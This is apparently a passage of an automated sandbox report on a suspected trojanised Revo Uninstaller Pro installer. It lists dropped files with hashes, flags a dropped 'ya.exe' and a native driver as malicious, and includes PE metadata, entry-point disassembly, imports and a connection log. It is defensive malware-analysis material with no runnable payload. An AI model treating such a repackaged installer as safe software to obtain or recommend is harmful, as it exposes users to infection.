                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:53:06 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1158
                                                                                                                                                                          Entropy (8bit):4.487432544389539
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:8msdJNXolNV9Af2KrNRUdo3qAWdo3oww3Bm:8msdJFolP2f2q7Udo3qdo3xwx
                                                                                                                                                                          MD5:818B1D6815C7B252054CD68D68FAE1BB
                                                                                                                                                                          SHA1:92C68470F778FB97C9B4E7146E236006150CCDE0
                                                                                                                                                                          SHA-256:CA1CA038AE12B5BD3E1B20A56FC613427760A88CF24833C2BD4C66A1F9958429
                                                                                                                                                                          SHA-512:F35217CD9E3A9050EF71ADB8A5AD8C0AEE624DB984719D9715A12639E4050791D325D3F936A5F71E441342AAC71D643AAED9ACD572CE2E0996464318D9FD9BB5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.... ....<..vD..Bb..ZJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y....PROGRA~1..t......O.I.Y......B...............J.....\d..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y....VSREVO~1..L......Y...Y............................\d..V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y....REVOUN~1..Z......Y...Y......3.........................R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y................................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q....................C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..[.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X..
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 9 15:52:52 2024, mtime=Mon Dec 9 15:52:52 2024, atime=Mon Dec 9 15:52:52 2024, length=179964, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1148
                                                                                                                                                                          Entropy (8bit):4.509616308195339
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:8m4ICbYX1h9HBdpF4ItNXjN+f7hG2AelYYoYG+jAw4t2XF1dTMbdpmBhG2AwhGwu:8mHdJNXolngYbAN2VEdo3thLdo3oPBm
                                                                                                                                                                          MD5:01FADDBDE92BD12DB18204AF7B789E49
                                                                                                                                                                          SHA1:6B1F0BD2A41B285D28E1C7FC1764CAE46F29C028
                                                                                                                                                                          SHA-256:0B146127338CF15DA90B6706CD81A3774E56059193CC27723150146A92D2CEB7
                                                                                                                                                                          SHA-512:765DDF343F9A76114D1E14BA78AD51AF7628E51E758331D39B302CB6FC0EEAF1486F4D1621A2DC0CABD1D88CA4E928DF0D8672D36AEA66247F54E23AEEA71331
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.... ...`s|.ZJ....~.ZJ....~.ZJ...............................P.O. .:i.....+00.../C:\.....................1......Y....PROGRA~1..t......O.I.Y......B...............J.....\d..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y....VSREVO~1..L......Y...Y............................\d..V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y....REVOUN~1..Z......Y...Y......3.........................R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....h.2......Y.. .UNINST~1.EXE..L......Y...Y......I.....................J...U.n.i.n.s.t.a.l.l...e.x.e.......p...............-.......o....................C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe..Y.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.U.n.i.n.s.t.a.l.l...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......92753
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                          Entropy (8bit):3.3454618442383204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:FkWXlAx1H:9ATH
                                                                                                                                                                          MD5:F1EB47FC602AD555F893959A83D17A2D
                                                                                                                                                                          SHA1:568D28B6EC8244685138AB2425DC411F00C21DDD
                                                                                                                                                                          SHA-256:CE6803614EE9B4E37F45474788752C9AE0C0D5FDD42A821A4C1F4D38ADF462C6
                                                                                                                                                                          SHA-512:517367311167AFBCDFF9C90D2AACEEB24CEFA1797651C58251624504BD5E2274A800CD11A8D4030BF118A5EAE42659ABCA87B6817065B8894B202341A5F906BF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:sdPC......................6....A....W."
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:52:57 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1122
                                                                                                                                                                          Entropy (8bit):4.521323255097946
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:8mK/dJNXolNVhAf2Krado3qAWdo3oww3Bm:8mudJFolPyf2qado3qdo3xwx
                                                                                                                                                                          MD5:154CEE59B2BF7C7A0E84F90CC3A9B3A8
                                                                                                                                                                          SHA1:751CD73551B6266E3A67C06B182E485760B84ED1
                                                                                                                                                                          SHA-256:6B1181FC888E544F0804B5B1CE2BDEC176B5D66D54F05F238B69D733C1ED6CDC
                                                                                                                                                                          SHA-512:0D2E2BEC97C9F6365817BA74A8A5B97FB788294400AA371867AC4B8C03FCE3E7531D3260DAB76FE34B76E8F9E6CB0702E51CE02D14F36C37FE4AB706973196E9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.... ....<..vD...)|.ZJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y....PROGRA~1..t......O.I.Y......B...............J.....\d..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y....VSREVO~1..L......Y...Y............................\d..V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y....REVOUN~1..Z......Y...Y......3.........................R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y................................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q....................C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..I.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......927537...........hT..CrF.f4...
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2227280
                                                                                                                                                                          Entropy (8bit):7.916292558024388
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:mVAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtS:iAJdi3+ZN06+Nzdn5w8i
                                                                                                                                                                          MD5:5A1105F1C25A60B128D45EC03041BF48
                                                                                                                                                                          SHA1:DCCC4587FB20170B8014DEB61A7C371FAC15ED01
                                                                                                                                                                          SHA-256:C2A58EFE4CDD4CD48A9C2F77CBA4BC0898F0A5953F6065C2D270A8A1DC7A8FCD
                                                                                                                                                                          SHA-512:9058164DCD3B802268DC8D5EC916A53976CF17CF6A4D4F5BE9626B91DDAED7AE159E009E90E0FBF0D1E16CD4C00C4D9268FF67D2F5D43037002D91E4C4017D48
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................5"...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32
                                                                                                                                                                          Entropy (8bit):3.4772170014624826
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:alXtRBXFIvCOt:aldTXFcz
                                                                                                                                                                          MD5:B8F4AE17649F67195291A85DE16B561D
                                                                                                                                                                          SHA1:1800356941EAFADF247EA9932A02FFEC6C4E4B4C
                                                                                                                                                                          SHA-256:0FD98AA12C34794DABD32375F4B14B207D4840359AB571D278D2ED490BDDE75A
                                                                                                                                                                          SHA-512:F640756A1233CC9596AA273C2A4A0296D7F87788486956F8319C4521F27957201DCBA805A7D994B3EAA12249645D5A4B28134C91FE3A4062891612115A941DAC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:........:Installer message:.....
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.999566849269054
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File size:22'221'229 bytes
                                                                                                                                                                          MD5:881464f03502d44e29e5fea8b4c35538
                                                                                                                                                                          SHA1:8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
                                                                                                                                                                          SHA256:2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
                                                                                                                                                                          SHA512:11db58ebb0f053721c2f4125fa60503a860df5aca55db942608aa42266d07904f5d0f595e34d746370bc9391014b34813c24fb2b2d904c12b1840d97fd4c6479
                                                                                                                                                                          SSDEEP:393216:ErPY1+m1GCcgxv4sV3krTPLt3kkNmE3SgH4J2Nd7R4mPJi5nwMEFAEcd7TJPYItE:ErGcgxwsVATPL9nm4H4kNgkFKnHQrrR
                                                                                                                                                                          TLSH:A527335E911031E4EB528BF0FBB6DE6452EF2022C6F07D5F2C55779ED48049AAEA4C0B
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@.
                                                                                                                                                                          Icon Hash:492da5c5a55ad676
                                                                                                                                                                          Entrypoint:0x403665
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x66084422 [Sat Mar 30 16:56:02 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                                                          Instruction
                                                                                                                                                                          sub esp, 000003F8h
                                                                                                                                                                          push ebp
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edi
                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [esp+20h], ebp
                                                                                                                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                          call dword ptr [004080A0h]
                                                                                                                                                                          mov esi, dword ptr [004080A4h]
                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007FADA8ACA31Ah
                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [esp+48h]
                                                                                                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                          not eax
                                                                                                                                                                          and eax, ecx
                                                                                                                                                                          mov word ptr [esp+00000148h], ax
                                                                                                                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                          jnc 00007FADA8ACA2E8h
                                                                                                                                                                          and word ptr [esp+42h], 0000h
                                                                                                                                                                          mov eax, dword ptr [esp+40h]
                                                                                                                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                          mov dword ptr [0046C318h], eax
                                                                                                                                                                          xor eax, eax
                                                                                                                                                                          mov ah, byte ptr [esp+38h]
                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                          mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1790000x1a3c8.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x66d70x6800179c19d526cb45e37f19e2e748c03470False0.6618088942307693data6.443211282113973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0xa0000x623780x60011e66ee9873a378c86020f9b7ffc48f2False0.509765625data4.120231668410469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .ndata0x6d0000x10c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x1790000x1a3c80x1a400f5b854e8e43a68f60abf87a5e757a321False0.690141369047619data6.5935216467364866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0x1794a80xcd42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9968789251322651
                                                                                                                                                                          RT_ICON0x1861f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3778932451582428
                                                                                                                                                                          RT_ICON0x18a4180x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.3514797507788162
                                                                                                                                                                          RT_ICON0x18d6400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4713692946058091
                                                                                                                                                                          RT_ICON0x18fbe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5079737335834896
                                                                                                                                                                          RT_ICON0x190c900xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.4762345679012346
                                                                                                                                                                          RT_ICON0x1919380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6693262411347518
                                                                                                                                                                          RT_ICON0x191da00x2e8dataEnglishUnited States0.020161290322580645
                                                                                                                                                                          RT_ICON0x1920880x128dataEnglishUnited States0.04391891891891892
                                                                                                                                                                          RT_DIALOG0x1921b00x114dataEnglishUnited States0.5072463768115942
                                                                                                                                                                          RT_DIALOG0x1922c80x1f4dataEnglishUnited States0.388
                                                                                                                                                                          RT_DIALOG0x1924c00xecdataEnglishUnited States0.6228813559322034
                                                                                                                                                                          RT_DIALOG0x1925b00x94dataEnglishUnited States0.5945945945945946
                                                                                                                                                                          RT_DIALOG0x1926480xe2dataEnglishUnited States0.6371681415929203
                                                                                                                                                                          RT_DIALOG0x1927300x114dataEnglishUnited States0.5362318840579711
                                                                                                                                                                          RT_DIALOG0x1928480x1f4dataEnglishUnited States0.398
                                                                                                                                                                          RT_DIALOG0x192a400xecdataEnglishUnited States0.6567796610169492
                                                                                                                                                                          RT_DIALOG0x192b300x94dataEnglishUnited States0.668918918918919
                                                                                                                                                                          RT_DIALOG0x192bc80xe2dataEnglishUnited States0.668141592920354
                                                                                                                                                                          RT_GROUP_ICON0x192cb00x84dataEnglishUnited States0.6212121212121212
                                                                                                                                                                          RT_VERSION0x192d380x260dataEnglishUnited States0.4819078947368421
                                                                                                                                                                          RT_MANIFEST0x192f980x42eXML 1.0 document, ASCII text, with very long lines (1070), with no line terminatorsEnglishUnited States0.5130841121495328
                                                                                                                                                                          DLLImport
                                                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                                          KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 9, 2024 17:53:09.956913948 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:09.956959963 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:09.957030058 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:09.975562096 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:09.975583076 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.193116903 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.193279028 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.620898008 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.620927095 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.621328115 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.621474028 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.639358044 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.687340021 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.986078024 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.986181974 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.986182928 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:11.986608028 CET49736443192.168.2.4104.20.3.235
